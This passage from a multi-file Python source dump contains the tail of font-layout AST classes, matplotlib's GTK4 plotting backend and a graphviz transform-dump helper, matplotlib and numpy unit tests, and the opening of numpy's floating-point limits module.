coverage = ''.join(str(c) for c in coverage)
res += f' LEFT{coverage}\n'
for coverage in self.right:
coverage = ''.join(str(c) for c in coverage)
res += f' RIGHT{coverage}\n'
res += 'END_CONTEXT'
return res
class AnchorDefinition(Statement):
def __init__(self, name, gid, glyph_name, component, locked,
pos, location=None):
Statement.__init__(self, location)
self.name = name
self.gid = gid
self.glyph_name = glyph_name
self.component = component
self.locked = locked
self.pos = pos
def __str__(self):
locked = self.locked and ' LOCKED' or ''
return (f'DEF_ANCHOR "{self.name}"'
f' ON {self.gid}'
f' GLYPH {self.glyph_name}'
f' COMPONENT {self.component}'
f'{locked}'
f' AT {self.pos} END_ANCHOR')
class SettingDefinition(Statement):
def __init__(self, name, value, location=None):
Statement.__init__(self, location)
self.name = name
self.value = value
def __str__(self):
if self.value is True:
return f'{self.name}'
if isinstance(self.value, (tuple, list)):
value = " ".join(str(v) for v in self.value)
return f'{self.name} {value}'
return f'{self.name} {self.value}'
```
#### File: matplotlib/backends/backend_gtk4.py
```python
import functools
import io
import os
from pathlib import Path
import sys
import matplotlib as mpl
from matplotlib import _api, backend_tools, cbook
from matplotlib._pylab_helpers import Gcf
from matplotlib.backend_bases import (
_Backend, FigureCanvasBase, FigureManagerBase, NavigationToolbar2,
TimerBase, ToolContainerBase)
from matplotlib.backend_tools import Cursors
from matplotlib.figure import Figure
from matplotlib.widgets import SubplotTool
try:
import gi
except ImportError as err:
raise ImportError("The GTK4 backends require PyGObject") from err
try:
# :raises ValueError: If module/version is already loaded, already
# required, or unavailable.
gi.require_version("Gtk", "4.0")
except ValueError as e:
# in this case we want to re-raise as ImportError so the
# auto-backend selection logic correctly skips.
raise ImportError from e
from gi.repository import Gio, GLib, GObject, Gtk, Gdk, GdkPixbuf
from ._backend_gtk import (
_create_application, _shutdown_application,
backend_version, _BackendGTK, _NavigationToolbar2GTK,
TimerGTK as TimerGTK4,
ConfigureSubplotsGTK as ConfigureSubplotsGTK4,
RubberbandGTK as RubberbandGTK4,
)
def _mpl_to_gtk_cursor(mpl_cursor):
return _api.check_getitem({
Cursors.MOVE: "move",
Cursors.HAND: "pointer",
Cursors.POINTER: "default",
Cursors.SELECT_REGION: "crosshair",
Cursors.WAIT: "wait",
Cursors.RESIZE_HORIZONTAL: "ew-resize",
Cursors.RESIZE_VERTICAL: "ns-resize",
}, cursor=mpl_cursor)
class FigureCanvasGTK4(Gtk.DrawingArea, FigureCanvasBase):
required_interactive_framework = "gtk4"
supports_blit = False
_timer_cls = TimerGTK4
_context_is_scaled = False
def __init__(self, figure=None):
FigureCanvasBase.__init__(self, figure)
GObject.GObject.__init__(self)
self.set_hexpand(True)
self.set_vexpand(True)
self._idle_draw_id = 0
self._lastCursor = None
self._rubberband_rect = None
self.set_draw_func(self._draw_func)
self.connect('resize', self.resize_event)
self.connect('notify::scale-factor', self._update_device_pixel_ratio)
click = Gtk.GestureClick()
click.set_button(0) # All buttons.
click.connect('pressed', self.button_press_event)
click.connect('released', self.button_release_event)
self.add_controller(click)
key = Gtk.EventControllerKey()
key.connect('key-pressed', self.key_press_event)
key.connect('key-released', self.key_release_event)
self.add_controller(key)
motion = Gtk.EventControllerMotion()
motion.connect('motion', self.motion_notify_event)
motion.connect('enter', self.enter_notify_event)
motion.connect('leave', self.leave_notify_event)
self.add_controller(motion)
scroll = Gtk.EventControllerScroll.new(
Gtk.EventControllerScrollFlags.VERTICAL)
scroll.connect('scroll', self.scroll_event)
self.add_controller(scroll)
self.set_focusable(True)
css = Gtk.CssProvider()
css.load_from_data(b".matplotlib-canvas { background-color: white; }")
style_ctx = self.get_style_context()
style_ctx.add_provider(css, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)
style_ctx.add_class("matplotlib-canvas")
def pick(self, mouseevent):
# GtkWidget defines pick in GTK4, so we need to override here to work
# with the base implementation we want.
FigureCanvasBase.pick(self, mouseevent)
def destroy(self):
self.close_event()
def set_cursor(self, cursor):
# docstring inherited
self.set_cursor_from_name(_mpl_to_gtk_cursor(cursor))
def _mouse_event_coords(self, x, y):
"""
Calculate mouse coordinates in physical pixels.
GTK use logical pixels, but the figure is scaled to physical pixels for
rendering. Transform to physical pixels so that all of the down-stream
transforms work as expected.
Also, the origin is different and needs to be corrected.
"""
x = x * self.device_pixel_ratio
# flip y so y=0 is bottom of canvas
y = self.figure.bbox.height - y * self.device_pixel_ratio
return x, y
def scroll_event(self, controller, dx, dy):
FigureCanvasBase.scroll_event(self, 0, 0, dy)
return True
def button_press_event(self, controller, n_press, x, y):
x, y = self._mouse_event_coords(x, y)
FigureCanvasBase.button_press_event(self, x, y,
controller.get_current_button())
self.grab_focus()
def button_release_event(self, controller, n_press, x, y):
x, y = self._mouse_event_coords(x, y)
FigureCanvasBase.button_release_event(self, x, y,
controller.get_current_button())
def key_press_event(self, controller, keyval, keycode, state):
key = self._get_key(keyval, keycode, state)
FigureCanvasBase.key_press_event(self, key)
return True
def key_release_event(self, controller, keyval, keycode, state):
key = self._get_key(keyval, keycode, state)
FigureCanvasBase.key_release_event(self, key)
return True
def motion_notify_event(self, controller, x, y):
x, y = self._mouse_event_coords(x, y)
FigureCanvasBase.motion_notify_event(self, x, y)
def leave_notify_event(self, controller):
FigureCanvasBase.leave_notify_event(self)
def enter_notify_event(self, controller, x, y):
x, y = self._mouse_event_coords(x, y)
FigureCanvasBase.enter_notify_event(self, xy=(x, y))
def resize_event(self, area, width, height):
self._update_device_pixel_ratio()
dpi = self.figure.dpi
winch = width * self.device_pixel_ratio / dpi
hinch = height * self.device_pixel_ratio / dpi
self.figure.set_size_inches(winch, hinch, forward=False)
FigureCanvasBase.resize_event(self)
self.draw_idle()
def _get_key(self, keyval, keycode, state):
unikey = chr(Gdk.keyval_to_unicode(keyval))
key = cbook._unikey_or_keysym_to_mplkey(
unikey,
Gdk.keyval_name(keyval))
modifiers = [
(Gdk.ModifierType.CONTROL_MASK, 'ctrl'),
(Gdk.ModifierType.ALT_MASK, 'alt'),
(Gdk.ModifierType.SHIFT_MASK, 'shift'),
(Gdk.ModifierType.SUPER_MASK, 'super'),
]
for key_mask, prefix in modifiers:
if state & key_mask:
if not (prefix == 'shift' and unikey.isprintable()):
key = f'{prefix}+{key}'
return key
def _update_device_pixel_ratio(self, *args, **kwargs):
# We need to be careful in cases with mixed resolution displays if
# device_pixel_ratio changes.
if self._set_device_pixel_ratio(self.get_scale_factor()):
self.draw()
def _draw_rubberband(self, rect):
self._rubberband_rect = rect
# TODO: Only update the rubberband area.
self.queue_draw()
def _draw_func(self, drawing_area, ctx, width, height):
self.on_draw_event(self, ctx)
self._post_draw(self, ctx)
def _post_draw(self, widget, ctx):
if self._rubberband_rect is None:
return
lw = 1
dash = 3
if not self._context_is_scaled:
x0, y0, w, h = (dim / self.device_pixel_ratio
for dim in self._rubberband_rect)
else:
x0, y0, w, h = self._rubberband_rect
lw *= self.device_pixel_ratio
dash *= self.device_pixel_ratio
x1 = x0 + w
y1 = y0 + h
# Draw the lines from x0, y0 towards x1, y1 so that the
# dashes don't "jump" when moving the zoom box.
ctx.move_to(x0, y0)
ctx.line_to(x0, y1)
ctx.move_to(x0, y0)
ctx.line_to(x1, y0)
ctx.move_to(x0, y1)
ctx.line_to(x1, y1)
ctx.move_to(x1, y0)
ctx.line_to(x1, y1)
ctx.set_antialias(1)
ctx.set_line_width(lw)
ctx.set_dash((dash, dash), 0)
ctx.set_source_rgb(0, 0, 0)
ctx.stroke_preserve()
ctx.set_dash((dash, dash), dash)
ctx.set_source_rgb(1, 1, 1)
ctx.stroke()
def on_draw_event(self, widget, ctx):
# to be overwritten by GTK4Agg or GTK4Cairo
pass
def draw(self):
# docstring inherited
if self.is_drawable():
self.queue_draw()
def draw_idle(self):
# docstring inherited
if self._idle_draw_id != 0:
return
def idle_draw(*args):
try:
self.draw()
finally:
self._idle_draw_id = 0
return False
self._idle_draw_id = GLib.idle_add(idle_draw)
def flush_events(self):
# docstring inherited
context = GLib.MainContext.default()
while context.pending():
context.iteration(True)
class FigureManagerGTK4(FigureManagerBase):
"""
Attributes
----------
canvas : `FigureCanvas`
The FigureCanvas instance
num : int or str
The Figure number
toolbar : Gtk.Box
The toolbar
vbox : Gtk.VBox
The Gtk.VBox containing the canvas and toolbar
window : Gtk.Window
The Gtk.Window
"""
def __init__(self, canvas, num):
app = _create_application()
self.window = Gtk.Window()
app.add_window(self.window)
super().__init__(canvas, num)
self.vbox = Gtk.Box()
self.vbox.set_property("orientation", Gtk.Orientation.VERTICAL)
self.window.set_child(self.vbox)
self.vbox.prepend(self.canvas)
# calculate size for window
w, h = self.canvas.get_width_height()
self.toolbar = self._get_toolbar()
if self.toolmanager:
backend_tools.add_tools_to_manager(self.toolmanager)
if self.toolbar:
backend_tools.add_tools_to_container(self.toolbar)
if self.toolbar is not None:
sw = Gtk.ScrolledWindow(vscrollbar_policy=Gtk.PolicyType.NEVER)
sw.set_child(self.toolbar)
self.vbox.append(sw)
min_size, nat_size = self.toolbar.get_preferred_size()
h += nat_size.height
self.window.set_default_size(w, h)
self._destroying = False
self.window.connect("destroy", lambda *args: Gcf.destroy(self))
self.window.connect("close-request", lambda *args: Gcf.destroy(self))
if mpl.is_interactive():
self.window.show()
self.canvas.draw_idle()
self.canvas.grab_focus()
def destroy(self, *args):
if self._destroying:
# Otherwise, this can be called twice when the user presses 'q',
# which calls Gcf.destroy(self), then this destroy(), then triggers
# Gcf.destroy(self) once again via
# `connect("destroy", lambda *args: Gcf.destroy(self))`.
return
self._destroying = True
self.window.destroy()
self.canvas.destroy()
def show(self):
# show the figure window
self.window.show()
self.canvas.draw()
if mpl.rcParams['figure.raise_window']:
if self.window.get_surface():
self.window.present()
else:
# If this is called by a callback early during init,
# self.window (a GtkWindow) may not have an associated
# low-level GdkSurface (self.window.get_surface()) yet, and
# present() would crash.
_api.warn_external("Cannot raise window yet to be setup")
def full_screen_toggle(self):
if not self.window.is_fullscreen():
self.window.fullscreen()
else:
self.window.unfullscreen()
def _get_toolbar(self):
# must be inited after the window, drawingArea and figure
# attrs are set
if mpl.rcParams['toolbar'] == 'toolbar2':
toolbar = NavigationToolbar2GTK4(self.canvas, self.window)
elif mpl.rcParams['toolbar'] == 'toolmanager':
toolbar = ToolbarGTK4(self.toolmanager)
else:
toolbar = None
return toolbar
def get_window_title(self):
return self.window.get_title()
def set_window_title(self, title):
self.window.set_title(title)
def resize(self, width, height):
"""Set the canvas size in pixels."""
width = int(width / self.canvas.device_pixel_ratio)
height = int(height / self.canvas.device_pixel_ratio)
if self.toolbar:
min_size, nat_size = self.toolbar.get_preferred_size()
height += nat_size.height
canvas_size = self.canvas.get_allocation()
self.window.set_default_size(width, height)
class NavigationToolbar2GTK4(_NavigationToolbar2GTK, Gtk.Box):
def __init__(self, canvas, window):
self.win = window
Gtk.Box.__init__(self)
self.add_css_class('toolbar')
self._gtk_ids = {}
for text, tooltip_text, image_file, callback in self.toolitems:
if text is None:
self.append(Gtk.Separator())
continue
image = Gtk.Image.new_from_gicon(
Gio.Icon.new_for_string(
str(cbook._get_data_path('images',
f'{image_file}-symbolic.svg'))))
self._gtk_ids[text] = button = (
Gtk.ToggleButton() if callback in ['zoom', 'pan'] else
Gtk.Button())
button.set_child(image)
button.add_css_class('flat')
button.add_css_class('image-button')
# Save the handler id, so that we can block it as needed.
button._signal_handler = button.connect(
'clicked', getattr(self, callback))
button.set_tooltip_text(tooltip_text)
self.append(button)
# This filler item ensures the toolbar is always at least two text
# lines high. Otherwise the canvas gets redrawn as the mouse hovers
# over images because those use two-line messages which resize the
# toolbar.
label = Gtk.Label()
label.set_markup(
'<small>\N{NO-BREAK SPACE}\n\N{NO-BREAK SPACE}</small>')
label.set_hexpand(True) # Push real message to the right.
self.append(label)
self.message = Gtk.Label()
self.append(self.message)
NavigationToolbar2.__init__(self, canvas)
def save_figure(self, *args):
dialog = Gtk.FileChooserNative(
title='Save the figure',
transient_for=self.canvas.get_root(),
action=Gtk.FileChooserAction.SAVE,
modal=True)
self._save_dialog = dialog # Must keep a reference.
ff = Gtk.FileFilter()
ff.set_name('All files')
ff.add_pattern('*')
dialog.add_filter(ff)
dialog.set_filter(ff)
formats = []
default_format = None
for i, (name, fmts) in enumerate(
self.canvas.get_supported_filetypes_grouped().items()):
ff = Gtk.FileFilter()
ff.set_name(name)
for fmt in fmts:
ff.add_pattern(f'*.{fmt}')
dialog.add_filter(ff)
formats.append(name)
if self.canvas.get_default_filetype() in fmts:
default_format = i
# Setting the choice doesn't always work, so make sure the default
# format is first.
formats = [formats[default_format], *formats[:default_format],
*formats[default_format+1:]]
dialog.add_choice('format', 'File format', formats, formats)
dialog.set_choice('format', formats[default_format])
dialog.set_current_folder(Gio.File.new_for_path(
os.path.expanduser(mpl.rcParams['savefig.directory'])))
dialog.set_current_name(self.canvas.get_default_filename())
@functools.partial(dialog.connect, 'response')
def on_response(dialog, response):
file = dialog.get_file()
fmt = dialog.get_choice('format')
fmt = self.canvas.get_supported_filetypes_grouped()[fmt][0]
dialog.destroy()
self._save_dialog = None
if response != Gtk.ResponseType.ACCEPT:
return
# Save dir for next time, unless empty str (which means use cwd).
if mpl.rcParams['savefig.directory']:
parent = file.get_parent()
mpl.rcParams['savefig.directory'] = parent.get_path()
try:
self.canvas.figure.savefig(file.get_path(), format=fmt)
except Exception as e:
msg = Gtk.MessageDialog(
transient_for=self.canvas.get_root(),
message_type=Gtk.MessageType.ERROR,
buttons=Gtk.ButtonsType.OK, modal=True,
text=str(e))
msg.show()
dialog.show()
class ToolbarGTK4(ToolContainerBase, Gtk.Box):
_icon_extension = '-symbolic.svg'
def __init__(self, toolmanager):
ToolContainerBase.__init__(self, toolmanager)
Gtk.Box.__init__(self)
self.set_property('orientation', Gtk.Orientation.HORIZONTAL)
# Tool items are created later, but must appear before the message.
self._tool_box = Gtk.Box()
self.append(self._tool_box)
self._groups = {}
self._toolitems = {}
# This filler item ensures the toolbar is always at least two text
# lines high. Otherwise the canvas gets redrawn as the mouse hovers
# over images because those use two-line messages which resize the
# toolbar.
label = Gtk.Label()
label.set_markup(
'<small>\N{NO-BREAK SPACE}\n\N{NO-BREAK SPACE}</small>')
label.set_hexpand(True) # Push real message to the right.
self.append(label)
self._message = Gtk.Label()
self.append(self._message)
def add_toolitem(self, name, group, position, image_file, description,
toggle):
if toggle:
button = Gtk.ToggleButton()
else:
button = Gtk.Button()
button.set_label(name)
button.add_css_class('flat')
if image_file is not None:
image = Gtk.Image.new_from_gicon(
Gio.Icon.new_for_string(image_file))
button.set_child(image)
button.add_css_class('image-button')
if position is None:
position = -1
self._add_button(button, group, position)
signal = button.connect('clicked', self._call_tool, name)
button.set_tooltip_text(description)
self._toolitems.setdefault(name, [])
self._toolitems[name].append((button, signal))
def _find_child_at_position(self, group, position):
children = [None]
child = self._groups[group].get_first_child()
while child is not None:
children.append(child)
child = child.get_next_sibling()
return children[position]
def _add_button(self, button, group, position):
if group not in self._groups:
if self._groups:
self._add_separator()
group_box = Gtk.Box()
self._tool_box.append(group_box)
self._groups[group] = group_box
self._groups[group].insert_child_after(
button, self._find_child_at_position(group, position))
def _call_tool(self, btn, name):
self.trigger_tool(name)
def toggle_toolitem(self, name, toggled):
if name not in self._toolitems:
return
for toolitem, signal in self._toolitems[name]:
toolitem.handler_block(signal)
toolitem.set_active(toggled)
toolitem.handler_unblock(signal)
def remove_toolitem(self, name):
if name not in self._toolitems:
self.toolmanager.message_event(f'{name} not in toolbar', self)
return
for group in self._groups:
for toolitem, _signal in self._toolitems[name]:
if toolitem in self._groups[group]:
self._groups[group].remove(toolitem)
del self._toolitems[name]
def _add_separator(self):
sep = Gtk.Separator()
sep.set_property("orientation", Gtk.Orientation.VERTICAL)
self._tool_box.append(sep)
def set_message(self, s):
self._message.set_label(s)
class SaveFigureGTK4(backend_tools.SaveFigureBase):
def trigger(self, *args, **kwargs):
class PseudoToolbar:
canvas = self.figure.canvas
return NavigationToolbar2GTK4.save_figure(PseudoToolbar())
class HelpGTK4(backend_tools.ToolHelpBase):
def _normalize_shortcut(self, key):
"""
Convert Matplotlib key presses to GTK+ accelerator identifiers.
Related to `FigureCanvasGTK4._get_key`.
"""
special = {
'backspace': 'BackSpace',
'pagedown': 'Page_Down',
'pageup': 'Page_Up',
'scroll_lock': 'Scroll_Lock',
}
parts = key.split('+')
mods = ['<' + mod + '>' for mod in parts[:-1]]
key = parts[-1]
if key in special:
key = special[key]
elif len(key) > 1:
key = key.capitalize()
elif key.isupper():
mods += ['<shift>']
return ''.join(mods) + key
def _is_valid_shortcut(self, key):
"""
Check for a valid shortcut to be displayed.
- GTK will never send 'cmd+' (see `FigureCanvasGTK4._get_key`).
- The shortcut window only shows keyboard shortcuts, not mouse buttons.
"""
return 'cmd+' not in key and not key.startswith('MouseButton.')
def trigger(self, *args):
section = Gtk.ShortcutsSection()
for name, tool in sorted(self.toolmanager.tools.items()):
if not tool.description:
continue
# Putting everything in a separate group allows GTK to
# automatically split them into separate columns/pages, which is
# useful because we have lots of shortcuts, some with many keys
# that are very wide.
group = Gtk.ShortcutsGroup()
section.append(group)
# A hack to remove the title since we have no group naming.
child = group.get_first_child()
while child is not None:
child.set_visible(False)
child = child.get_next_sibling()
shortcut = Gtk.ShortcutsShortcut(
accelerator=' '.join(
self._normalize_shortcut(key)
for key in self.toolmanager.get_tool_keymap(name)
if self._is_valid_shortcut(key)),
title=tool.name,
subtitle=tool.description)
group.append(shortcut)
window = Gtk.ShortcutsWindow(
title='Help',
modal=True,
transient_for=self._figure.canvas.get_root())
window.set_child(section)
window.show()
class ToolCopyToClipboardGTK4(backend_tools.ToolCopyToClipboardBase):
def trigger(self, *args, **kwargs):
with io.BytesIO() as f:
self.canvas.print_rgba(f)
w, h = self.canvas.get_width_height()
pb = GdkPixbuf.Pixbuf.new_from_data(f.getbuffer(),
GdkPixbuf.Colorspace.RGB, True,
8, w, h, w*4)
clipboard = self.canvas.get_clipboard()
clipboard.set(pb)
backend_tools.ToolSaveFigure = SaveFigureGTK4
backend_tools.ToolConfigureSubplots = ConfigureSubplotsGTK4
backend_tools.ToolRubberband = RubberbandGTK4
backend_tools.ToolHelp = HelpGTK4
backend_tools.ToolCopyToClipboard = ToolCopyToClipboardGTK4
Toolbar = ToolbarGTK4
@_Backend.export
class _BackendGTK4(_BackendGTK):
FigureCanvas = FigureCanvasGTK4
FigureManager = FigureManagerGTK4
```
#### File: site-packages/matplotlib/_internal_utils.py
```python
from io import StringIO
from pathlib import Path
import subprocess
from matplotlib.transforms import TransformNode
def graphviz_dump_transform(transform, dest, *, highlight=None):
"""
Generate a graphical representation of the transform tree for *transform*
using the :program:`dot` program (which this function depends on). The
output format (png, dot, etc.) is determined from the suffix of *dest*.
Parameters
----------
transform : `~matplotlib.transform.Transform`
The represented transform.
dest : str
Output filename. The extension must be one of the formats supported
by :program:`dot`, e.g. png, svg, dot, ...
(see https://www.graphviz.org/doc/info/output.html).
highlight : list of `~matplotlib.transform.Transform` or None
The transforms in the tree to be drawn in bold.
If *None*, *transform* is highlighted.
"""
if highlight is None:
highlight = [transform]
seen = set()
def recurse(root, buf):
if id(root) in seen:
return
seen.add(id(root))
props = {}
label = type(root).__name__
if root._invalid:
label = f'[{label}]'
if root in highlight:
props['style'] = 'bold'
props['shape'] = 'box'
props['label'] = '"%s"' % label
props = ' '.join(map('{0[0]}={0[1]}'.format, props.items()))
buf.write(f'{id(root)} [{props}];\n')
for key, val in vars(root).items():
if isinstance(val, TransformNode) and id(root) in val._parents:
buf.write(f'"{id(root)}" -> "{id(val)}" '
f'[label="{key}", fontsize=10];\n')
recurse(val, buf)
buf = StringIO()
buf.write('digraph G {\n')
recurse(transform, buf)
buf.write('}\n')
subprocess.run(
['dot', '-T', Path(dest).suffix[1:], '-o', dest],
input=buf.getvalue().encode('utf-8'), check=True)
```
#### File: matplotlib/tests/test_cycles.py
```python
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import pytest
from cycler import cycler
def test_colorcycle_basic():
fig, ax = plt.subplots()
ax.set_prop_cycle(cycler('color', ['r', 'g', 'y']))
for _ in range(4):
ax.plot(range(10), range(10))
assert [l.get_color() for l in ax.lines] == ['r', 'g', 'y', 'r']
def test_marker_cycle():
fig, ax = plt.subplots()
ax.set_prop_cycle(cycler('c', ['r', 'g', 'y']) +
cycler('marker', ['.', '*', 'x']))
for _ in range(4):
ax.plot(range(10), range(10))
assert [l.get_color() for l in ax.lines] == ['r', 'g', 'y', 'r']
assert [l.get_marker() for l in ax.lines] == ['.', '*', 'x', '.']
def test_marker_cycle_kwargs_arrays_iterators():
fig, ax = plt.subplots()
ax.set_prop_cycle(c=np.array(['r', 'g', 'y']),
marker=iter(['.', '*', 'x']))
for _ in range(4):
ax.plot(range(10), range(10))
assert [l.get_color() for l in ax.lines] == ['r', 'g', 'y', 'r']
assert [l.get_marker() for l in ax.lines] == ['.', '*', 'x', '.']
def test_linestylecycle_basic():
fig, ax = plt.subplots()
ax.set_prop_cycle(cycler('ls', ['-', '--', ':']))
for _ in range(4):
ax.plot(range(10), range(10))
assert [l.get_linestyle() for l in ax.lines] == ['-', '--', ':', '-']
def test_fillcycle_basic():
fig, ax = plt.subplots()
ax.set_prop_cycle(cycler('c', ['r', 'g', 'y']) +
cycler('hatch', ['xx', 'O', '|-']) +
cycler('linestyle', ['-', '--', ':']))
for _ in range(4):
ax.fill(range(10), range(10))
assert ([p.get_facecolor() for p in ax.patches]
== [mpl.colors.to_rgba(c) for c in ['r', 'g', 'y', 'r']])
assert [p.get_hatch() for p in ax.patches] == ['xx', 'O', '|-', 'xx']
assert [p.get_linestyle() for p in ax.patches] == ['-', '--', ':', '-']
def test_fillcycle_ignore():
fig, ax = plt.subplots()
ax.set_prop_cycle(cycler('color', ['r', 'g', 'y']) +
cycler('hatch', ['xx', 'O', '|-']) +
cycler('marker', ['.', '*', 'D']))
t = range(10)
# Should not advance the cycler, even though there is an
# unspecified property in the cycler "marker".
# "marker" is not a Polygon property, and should be ignored.
ax.fill(t, t, 'r', hatch='xx')
# Allow the cycler to advance, but specify some properties
ax.fill(t, t, hatch='O')
ax.fill(t, t)
ax.fill(t, t)
assert ([p.get_facecolor() for p in ax.patches]
== [mpl.colors.to_rgba(c) for c in ['r', 'r', 'g', 'y']])
assert [p.get_hatch() for p in ax.patches] == ['xx', 'O', 'O', '|-']
def test_property_collision_plot():
fig, ax = plt.subplots()
ax.set_prop_cycle('linewidth', [2, 4])
t = range(10)
for c in range(1, 4):
ax.plot(t, t, lw=0.1)
ax.plot(t, t)
ax.plot(t, t)
assert [l.get_linewidth() for l in ax.lines] == [0.1, 0.1, 0.1, 2, 4]
def test_property_collision_fill():
fig, ax = plt.subplots()
ax.set_prop_cycle(linewidth=[2, 3, 4, 5, 6], facecolor='bgcmy')
t = range(10)
for c in range(1, 4):
ax.fill(t, t, lw=0.1)
ax.fill(t, t)
ax.fill(t, t)
assert ([p.get_facecolor() for p in ax.patches]
== [mpl.colors.to_rgba(c) for c in 'bgcmy'])
assert [p.get_linewidth() for p in ax.patches] == [0.1, 0.1, 0.1, 5, 6]
def test_valid_input_forms():
fig, ax = plt.subplots()
# These should not raise an error.
ax.set_prop_cycle(None)
ax.set_prop_cycle(cycler('linewidth', [1, 2]))
ax.set_prop_cycle('color', 'rgywkbcm')
ax.set_prop_cycle('lw', (1, 2))
ax.set_prop_cycle('linewidth', [1, 2])
ax.set_prop_cycle('linewidth', iter([1, 2]))
ax.set_prop_cycle('linewidth', np.array([1, 2]))
ax.set_prop_cycle('color', np.array([[1, 0, 0],
[0, 1, 0],
[0, 0, 1]]))
ax.set_prop_cycle('dashes', [[], [13, 2], [8, 3, 1, 3]])
ax.set_prop_cycle(lw=[1, 2], color=['k', 'w'], ls=['-', '--'])
ax.set_prop_cycle(lw=np.array([1, 2]),
color=np.array(['k', 'w']),
ls=np.array(['-', '--']))
def test_cycle_reset():
fig, ax = plt.subplots()
# Can't really test a reset because only a cycle object is stored
# but we can test the first item of the cycle.
prop = next(ax._get_lines.prop_cycler)
ax.set_prop_cycle(linewidth=[10, 9, 4])
assert prop != next(ax._get_lines.prop_cycler)
ax.set_prop_cycle(None)
got = next(ax._get_lines.prop_cycler)
assert prop == got
def test_invalid_input_forms():
fig, ax = plt.subplots()
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle(1)
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle([1, 2])
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle('color', 'fish')
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle('linewidth', 1)
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle('linewidth', {1, 2})
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle(linewidth=1, color='r')
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle('foobar', [1, 2])
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle(foobar=[1, 2])
with pytest.raises((TypeError, ValueError)):
ax.set_prop_cycle(cycler(foobar=[1, 2]))
with pytest.raises(ValueError):
ax.set_prop_cycle(cycler(color='rgb', c='cmy'))
```
#### File: matplotlib/tests/test_ttconv.py
```python
from pathlib import Path
import matplotlib
from matplotlib.testing.decorators import image_comparison
import matplotlib.pyplot as plt
@image_comparison(["truetype-conversion.pdf"])
# mpltest.ttf does not have "l"/"p" glyphs so we get a warning when trying to
# get the font extents.
def test_truetype_conversion(recwarn):
matplotlib.rcParams['pdf.fonttype'] = 3
fig, ax = plt.subplots()
ax.text(0, 0, "ABCDE",
font=Path(__file__).with_name("mpltest.ttf"), fontsize=80)
ax.set_xticks([])
ax.set_yticks([])
```
#### File: array_api/tests/test_sorting_functions.py
```python
import pytest
from numpy import array_api as xp
@pytest.mark.parametrize(
"obj, axis, expected",
[
([0, 0], -1, [0, 1]),
([0, 1, 0], -1, [1, 0, 2]),
([[0, 1], [1, 1]], 0, [[1, 0], [0, 1]]),
([[0, 1], [1, 1]], 1, [[1, 0], [0, 1]]),
],
)
def test_stable_desc_argsort(obj, axis, expected):
"""
Indices respect relative order of a descending stable-sort
See https://github.com/numpy/numpy/issues/20778
"""
x = xp.asarray(obj)
out = xp.argsort(x, axis=axis, stable=True, descending=True)
assert xp.all(out == xp.asarray(expected))
```
#### File: numpy/core/getlimits.py
```python
__all__ = ['finfo', 'iinfo']
import warnings
from ._machar import MachAr
from .overrides import set_module
from . import numeric
from . import numerictypes as ntypes
from .numeric import array, inf, NaN
from .umath import log10, exp2, nextafter, isnan
def _fr0(a):
"""fix rank-0 --> rank-1"""
if a.ndim == 0:
a = a.copy()
a.shape = (1,)
return a
def _fr1(a):
"""fix rank > 0 --> rank-0"""
if a.size == 1:
a = a.copy()
a.shape = ()
return a
class MachArLike:
""" Object to simulate MachAr instance """
def __init__(self, ftype, *, eps, epsneg, huge, tiny,
ibeta, smallest_subnormal=None, **kwargs):
self.params = _MACHAR_PARAMS[ftype]
self.ftype = ftype
self.title = self.params['title']
# Parameter types same as for discovered MachAr object.
if not smallest_subnormal:
self._smallest_subnormal = nextafter(
self.ftype(0), self.ftype(1), dtype=self.ftype)
else:
self._smallest_subnormal = smallest_subnormal
self.epsilon = self.eps = self._float_to_float(eps)
self.epsneg = self._float_to_float(epsneg)
self.xmax = self.huge = self._float_to_float(huge)
self.xmin = self._float_to_float(tiny)
self.smallest_normal = self.tiny = self._float_to_float(tiny)
self.ibeta = self.params['itype'](ibeta)
self.__dict__.update(kwargs)
self.precision = int(-log10(self.eps))
self.resolution = self._float_to_float(
self._float_conv(10) ** (-self.precision))
self._str_eps = self._float_to_str(self.eps)
self._str_epsneg = self._float_to_str(self.epsneg)
self._str_xmin = self._float_to_str(self.xmin)
self._str_xmax = self._float_to_str(self.xmax)
self._str_resolution = self._float_to_str(self.resolution)
self._str_smallest_normal = self._float_to_str(self.xmin)
@property
def smallest_subnormal(self):
"""Return the value for the smallest subnormal.
Returns
-------
smallest_subnormal : float
value for the smallest subnormal.
Warns
-----
UserWarning
If the calculated value for the smallest subnormal is zero.
"""
# Check that the calculated value is not zero, in case it raises a
# warning.
value = self._smallest_subnormal
if self.ftype(0) == value:
warnings.warn(
'The value of the smallest subnormal for {} type '
'is zero.'.format(self.ftype), UserWarning, stacklevel=2)
return self._float_to_float(value)
@property
def _str_smallest_subnormal(self):
"""Return the string representation of the smallest subnormal."""
return self._float_to_str(self.smallest_subnormal)
def _float_to_float(self, value):
"""Converts float to float.
Parameters
----------
value : float
value to be converted.
"""
return _fr1(self._float_conv(value))
def _float_conv(self, value):
"""Converts float to conv.
Parameters
----------
value : float
value to be converted.
"""
return array([value], self.ftype)
def _float_to_str(self, value):
"""Converts float to str.
Parameters
----------
value : float
value to be converted.
"""
return self.params['fmt'] % array(_fr0(value)[0], self.ftype)
_convert_to_float = {
ntypes.csingle: ntypes.single,
ntypes.complex_: ntypes.float_,
ntypes.clongfloat: ntypes.longfloat
}
# Parameters for creating MachAr / MachAr-like objects
_title_fmt = 'numpy {} precision floating point number'
_MACHAR_PARAMS = {
ntypes.double: dict(
itype = ntypes.int64,
fmt = '%24.16e',
title = _title_fmt.format('double')),
ntypes.single: dict(
itype = ntypes.int32,
fmt = '%15.7e',
title = _title_fmt.format('single')),
ntypes.longdouble: dict(
itype = ntypes.longlong,
fmt = '%s',
title = _title_fmt.format('long double')),
ntypes.half: dict(
itype = ntypes.int16,
fmt = '%12.5e',
title = _title_fmt.format('half'))}
# Key to identify the floating point type. Key is result of
# ftype('-0.1').newbyteorder('<').tobytes()
# See:
# https://perl5.git.perl.org/perl.git/blob/3118d7d684b56cbeb702af874f4326683c45f045:/Configure
_KNOWN_TYPES = {}
def _register_type(machar, bytepat):
_KNOWN_TYPES[bytepat] = machar
